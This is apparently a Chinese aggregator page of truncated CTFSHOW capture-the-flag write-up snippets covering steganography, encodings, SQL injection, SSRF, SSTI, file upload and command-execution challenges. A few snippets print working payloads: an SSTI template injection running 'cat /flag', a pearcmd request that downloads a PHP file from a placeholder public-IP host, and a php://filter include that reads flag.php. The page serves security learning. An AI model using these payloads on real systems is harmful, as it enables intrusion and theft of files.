CTFSHOW

sql注入题！ 注入位置是在登陆的 姓名处注入！ 题目答案：竟然不是做对题目然后出flag! ``` 1.CTF（Capture The Flag）起源于以下哪项赛事？ A A.DEFCON CTF B.CJB CTF C.XCTF D.S3C CTF 2.CTF不包含以下哪种⽐赛模式？ D A.解 ......

* misc11： 没有头绪，看了网上大佬的一些思路，受益匪浅，和大家分享下。 1.解压zip文件，用winhex打开misc11.png 2.判断文件格式是否篡改，检查png的文件头和文件尾，文件格式正常 PNG文件头(hex)：89 50 4e 47 0d 0a 1a 0a PNG文件尾(hex ......

一段.flac音频，提示隐写 下载audacity软件，打开 wp2 发现左声道是摩斯电码，这里给出一个大佬们用的摩斯电码音频解码工具 导出为MP3或者wav格式，开始解密 （使用audacity生成单声道音频）（静音+删除右耳声道+左耳导出为mp3格式） upload后play ......

右键链接另存保存图片，放入winhex 点击中显示“图像存在错误无法显示”，大概是有数据错了需要修改，导致打不开图片 查看后，参考博客，发现png文件署名域有误 改为89，保存，flag出现 ......

【隐写工具】【试一试？】jphide seek（JPHS） 使用方法,检测提示 放进JPHS，无密码seek保存为.txt格式 文件头有点像png，将后缀改为.png出现二维码，手机扫码跳转到CTFSHOW登录页面 【捂脸】看了眼wp，所以说找个QR解析工具看URL，得到： https://ctf. ......

小明的压缩包又忘记密码了？他去电脑维修店去修，人家扔出来说这个根本就没有密码，是个假密码。小明懵了，明明有密码的啊，你能帮帮小明吗？ 伪加密，放入winhex 一个 zip 文件由三个部分组成：压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 ......

QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg== 比base64还大的base 比base64还大的base有base85,base91,base92等 后面有两个等于号，是base64的形式 （当最后剩余两个八位(待补足)字节（2个byte）时，最后一个6位的Bas ......

图片这么好看，但是没啥用呦 图片隐写 图片隐写的解题思路汇总 解压后的word放进 010editor ......

文件的主人喜欢用生日做密码，而且还是个90后 ARCHPR ......

题目名称：我想吃培根 题目描述： -- .-. ... . ..--.- .. ... ..--.- -.-. .-.. ..--.- -... ..- - ..--.- -... .- -.-. -. ..--.- .. ... ..--.- -.-. .-.. . .-. ..--.- -- - ......

栅栏密码 密文： 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式：KEY{XXXXXXXXXXXXXX} 十六进制，想到 bas ......

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload： http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php： `"; ?>` 上传成功后显示： ``` do ......

小提示：需要从图片上提取flag文字，可以通过截图翻译或者微信发送图片，这两个的ai图像识别挺好用的。 misc1： 解压打开就能看见flag，提取出来就行 misc2： 记事本打开，看见 ng字符，尝试更改后缀为.png，重新打开看见flag misc3： 题目为bpg文件，使用一些看图软件可以打 ......

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截，右键查看源代码和f12均失效,两种方 ......

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹， ......

# ctfshow--web入门--XXE ## web373 源码 ```php loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //解析xml文档 $creds = simplexml_import_dom($dom); $ctfshow = ......

# ctfshow--web入门--文件上传 ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过  检查前端代码进 ......

## jwt介绍 对json格式的信息采取的一种编码 JWT：Json web token 由两个点分隔成三个部分，分别为: - Header - Payload - Signature： 如果在Header部分声明的签名算法为HS256，以及服务器约定使用的密钥为secret 那么签名使用的算法一 ......

# ctfshow-SSRF #### web351 flag在flag.php下，直接访问没有权限 使用curl_exec访问才有权限 > url = http://127.0.0.1/flag.php #### web352 开始上过滤了 使用`0.0.0.0`访问本机上的服务 > url = ......

# CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` ......

# ctfshow--web入门--文件上传 [TOC](目录标题) ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过 ![在这里插入图片描述](https://img-blog.csdnimg.cn/608e51750ded43f2aefc1c2a66a3e803. ......

# 武穆遗书 将exe文件放入exeinfo查看该执行文件被加了upx壳 ![image-20230609135243529](https://img2023.cnblogs.com/blog/2957075/202306/2957075-20230609161200627-1534549460.p ......

1、下载题目附件 进行解压 解压后发现两张图片，两张一样的图片，但是命名不同，我们可以想到这是一道盲水印题目。 2、解题步骤 这道题目需要用到python分离盲水印的脚本，推荐大家去GitHub上去下载源码 源码地址：https://github.com/chishaxie/BlindWaterMa ......

# CTFshowJava反序列化 ## web846 urldns链 ```Java import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutput; import java ......

考察点： 1，SSRF 2，Cloudflare代理服务器 3，CRLF 4，原生类反序列化 解题过程： 分析代码 <?php highlight_file(__FILE__); //flag.php $xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FO ......

# CTFshow web 入门 ## 命令执行 ### web29 ```php 代替，因为php语言最后一句话可以不用;结尾 pyload:?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php ......

# 极限命令执行1 第一关 ```php \"|`;\[\]]/",$ctfshow)){ system($ctfshow); }else{ echo("????????"); } } ?> ``` 脚本fuzz一下初步剩下 ``` ! $ ' ( ) , . / 0 1 2 3 4 5 6 7 8 ......

## CtfShow信息收集1-20关攻略 简单更新一下CTF关于信息收集的题目，总共20道，网站地址：https://ctf.show/challenges ![](https://files.mdnice.com/user/45320/b688c5aa-396f-4a3d-a602-e3654c ......

# 第一关 ```bash parse_url(string $url, int $component = -1): int|string|array|null|false 本函数解析 URL 并返回关联数组，包含在 URL 中出现的各种组成部分。数组的元素值不会 URL 解码。 本函数不是用来验证 ......

#ctfshow-misc入门 ##图片篇（文件结构) ###misc24 ####1.在010Editor中打开文件，根据鼠标自动提示找到图片宽高对应的地方 biWidth 指定图象的宽度，单位是象素。 biHeight 指定图象的高度，单位是象素。 ![](https://img2023.cnb ......